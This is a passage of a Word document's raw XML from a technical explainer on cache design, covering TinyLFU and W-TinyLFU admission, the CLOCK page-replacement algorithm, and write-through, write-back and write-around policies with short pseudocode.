    <w:p w14:paraId="7BCF83F7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The minimum across all hash function positions is the frequency estimate. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Never underestimates</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> (only false positives — overestimates due to hash collisions, never underestimates). Requires O(W × 4) space regardless of the number of items tracked — dramatically more memory-efficient than per-item counters for large working sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6306A57F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TinyLFU admission policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107E244" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>When a cache miss occurs and a new item must be admitted, TinyLFU compares the new item's estimated frequency against the eviction candidate's estimated frequency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767FF81B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1358"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If new item's frequency &gt; eviction candidate's frequency → admit new item, evict candidate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E26DC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1358"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If new item's frequency ≤ eviction candidate's frequency → </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reject new item</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — it's less popular than what would be evicted. The cache retains the eviction candidate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050593ED" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>This admission filter prevents cache pollution — one-hit wonders with frequency=1 don't evict items with frequency=10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4208A1F2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W-TinyLFU (Window TinyLFU):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60399941" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Used by Caffeine (Java's highest-performance cache library) and adapted by various CDN implementations. Splits the cache into:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB93260" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1359"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Window cache (1% of capacity):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Pure LRU. New items enter here regardless of frequency. Provides responsiveness to new items and recency spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CE4599" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1359"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protected segment (80% of capacity):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Items that have proven their value (high frequency). LRU within this segment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F50C551" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1359"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Probationary segment (20% of capacity):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Items promoted from window that need to prove their frequency. LRU within this segment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AE79E3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Promotion path: Window → Probationary (if frequency &gt; candidate) → Protected (on second access from probationary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886BB8D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W-TinyLFU significantly outperforms LRU</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> on real-world traces (web cache, database page cache, CDN cache) — typically 10–40% better hit rate for the same cache size. Caffeine's implementation is used by Spring, Guava (cache module), and Apache Ignite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D5F200" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CLOCK — The LRU Approximation for OS Page Caches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B1EBC6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The OS page cache cannot afford the doubly-linked list overhead of true LRU for millions of pages. CLOCK (Second Chance) approximates LRU with O(1) operations and minimal per-page memory overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AEFBD9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CLOCK algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4100837B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>All cached pages are arranged in a circular buffer (the clock). A hand sweeps around the clock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC0E2BE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C783CA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Each page has a reference bit (R):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E17C463" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  R=1: page was accessed since last sweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D5C1F1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  R=0: page hasn't been accessed recently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737DE1F6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="3F528909" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Clock hand operation (finding a victim):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60030C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  while hand's page has R=1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A61C8F6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    set R=0    (give it a second chance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44676AE5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    advance hand</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7CB1C0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  evict hand's page (R=0 — not accessed in a full sweep cycle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBF56F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> 1 bit per page (the reference bit). For a system with 1 million cached pages, CLOCK adds 125KB of overhead. True LRU would add two 8-byte pointers per page = 16MB. The 128× memory reduction per page makes CLOCK practical for OS page caches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C35F44" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CLOCK-Pro:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> A more sophisticated variant used in the Linux kernel for anonymous (non-file-backed) memory pages. Uses multiple clocks and frequency information to handle workloads that CLOCK handles poorly (large sequential scans).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132A9989" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="1E7932B5">
          <v:rect id="_x0000_i4791" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6450CA79" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Cache Consistency — The Hardest Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A747C85" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write Policies — The Full Spectrum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D9B7C2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B6539" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Every write updates both the cache and the backing store synchronously before acknowledging the write to the caller. Cache and store are always consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B16E3B9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582AE388" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>write(key, value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067C282" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  store.write(key, value)  ← synchronous, must complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279DB07F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  cache.write(key, value)  ← synchronous, must complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6788C59D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  return OK                ← only after both writes succeed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0511F939" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Write latency = store write latency (typically much higher than cache write latency). The cache write adds negligible overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D92A360" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Durability:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Perfect. Every acknowledged write is in both cache and store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D925F09" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Excellent — the cache always has the latest value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1354A8D9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Write-through is ideal when write latency is acceptable, data must never be lost, and reads are much more frequent than writes. CPU L1 cache commonly uses write-through to L2 cache — writes are so fast that L2 write latency doesn't matter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DE58BC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Back (Write-Behind):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FEFE36" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Writes update the cache immediately but are </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>asynchronously flushed</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> to the backing store. The write is acknowledged to the caller after the cache write — without waiting for the store write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066B3643" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0D573E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>write(key, value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD8DA7C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  cache.write(key, value, dirty=True)  ← instant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642B5A4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  return OK                            ← immediate, store not yet written</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383F3250" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A09D1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Background process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D78033" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  for each dirty cache entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E064F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    store.write(entry.key, entry.value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24E01C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    mark entry as clean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B68317" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Write latency = cache write latency (~microseconds for Redis, nanoseconds for in-process cache). Extremely low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CFD8ED" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Durability risk:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> If the cache fails before flushing dirty entries to the store, data is lost. The window of data loss = time since last flush.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1F88E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput benefit:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Write operations that update the same key multiple times before flush only result in one store write. A counter incremented 1,000 times between flushes generates one store write, not 1,000. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write coalescing</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> dramatically reduces store write pressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70692E1C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Database buffer pools use write-back — dirty pages are flushed periodically (checkpoint) and on cache eviction. Write-ahead logging (WAL) provides durability — the log is write-through (synchronous), but data pages use write-back. Redis's AOF (Append-Only File) with appendfsync everysec is write-back with a 1-second durability window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1ACFCD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Around:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2A70B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Writes go directly to the backing store, </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bypassing the cache</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t>. Reads first check the cache; on miss, fetch from store and populate cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF13FC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDE6CDB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>write(key, value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903043F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  store.write(key, value)  ← write goes directly to store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C6B3F0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  cache.invalidate(key)    ← invalidate any stale cached version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F1C9DE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  return OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA0EA9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="7E712808" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>read(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619B56A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  value = cache.get(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33517CC0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  if value is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582B920A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    value = store.read(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E5DA1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    cache.set(key, value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AAB4B7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  return value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E3B868" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> For write-heavy workloads where written data is unlikely to be read immediately. A batch import of 10 million records that won't be queried for hours benefits from write-around — no point warming the cache with data that will be evicted before it's read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40264526" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache population patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173794B4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read-through (lazy population):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Cache is populated on cache miss — fetch from store, cache the result. Simple, self-managing. The cache only contains data that's actually been requested.</w:t>
      </w:r>
